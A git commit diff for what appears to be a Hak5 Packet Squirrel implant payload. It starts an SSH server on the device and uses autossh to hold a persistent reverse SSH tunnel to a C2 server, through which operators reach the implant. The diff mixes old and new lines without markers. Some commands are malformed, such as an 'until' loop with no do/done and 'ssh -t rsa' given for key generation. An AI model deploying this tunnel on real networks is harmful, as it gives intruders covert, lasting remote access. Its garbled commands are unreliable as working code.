added functioning payload from dark_pyrro, payload is now fully functioning with autossh.

pull/37/head 2023-04-19 06:37:50 +00:00
parent a49f410a97
commit 96067bbe7c
1 changed files with 63 additions and 41 deletions

View File

@ -9,56 +9,78 @@
# LED State Descriptions
# Magenta Solid - SSH connecting
# Blue - SSH connection successful
# Amber - SSH connection successful
# C2 Server address, port and tunnel port
# no pass needed, headless mode required so RSA key file is used.
# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
# waiting for button press to start SSH connection.
# Magenta indicates SSH connection is launching and the server should have received the connection.
echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
# we need an IP, so it'll have to be NAT, unless implanted inline.
sleep 8
# debug
#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
# fix file permission problems
# chmod 600 id_rsa
# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
# the tunnel port specified on the server to reach the Squirrel.
# no pass needed, headless mode required so RSA key file is used.
# default port is 22
echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
# generate the key by running the following command in the /root/.ssh/ folder:
# 'ssh -t rsa -b 2048 -f id_rsa'
# To ensure that this works as intended, the user will have to connect to this host at least once
# with ssh -i /root/.ssh/id_rsa username@remote_server_ip to add this server to the squirrels list
# of trusted hosts.
# If this step fails, the payload will fail.
autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
exit 1
# For the life of me I couldn't get SSH to work. The funny thing was it would
# run in the shell command, but not in the payload. The following solution
# implements a tool called autossh which ensures nothing funky happens to the
# connection.
# the following was ripped from dark_pyrro (the legend) via:
# waiting until eth1 acquires IP address
while ! ifconfig "eth1" | grep "inet addr"; do sleep 1; done
echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
service sshd start
sleep 3
ssh -R $c2_tunnel_port: -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
# echo $ssh_out >> /root/payloads/switch3/debug.txt
# ssh_pid=$!
# starting sshd and waiting for process to start
/etc/init.d/sshd start
until netstat -tulpn | grep -qi "sshd"
sleep 1
echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
# stopping autossh
/etc/init.d/autossh stop
# Much like the SSH server, AutoSSH has a configuration file. This
# needs to be configured to support this connection as a daemon.
# Create a "fresh template" for the autossh configuration
# Starting with an empty autossh file in /etc/config
# isn't something that uci is very fond of
echo "config autossh" > /etc/config/autossh
echo " option ssh" >> /etc/config/autossh
echo " option enabled" >> /etc/config/autossh
# UCI configuration and commission
uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T"
uci set autossh.@autossh[0].enabled="1"
uci commit autossh
# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
# SSH will prompt for verification, and to add host to trusted hosts file.
#BUTTON 365d && {
# kill $ssh_pid
# starting autossh
/etc/init.d/autossh start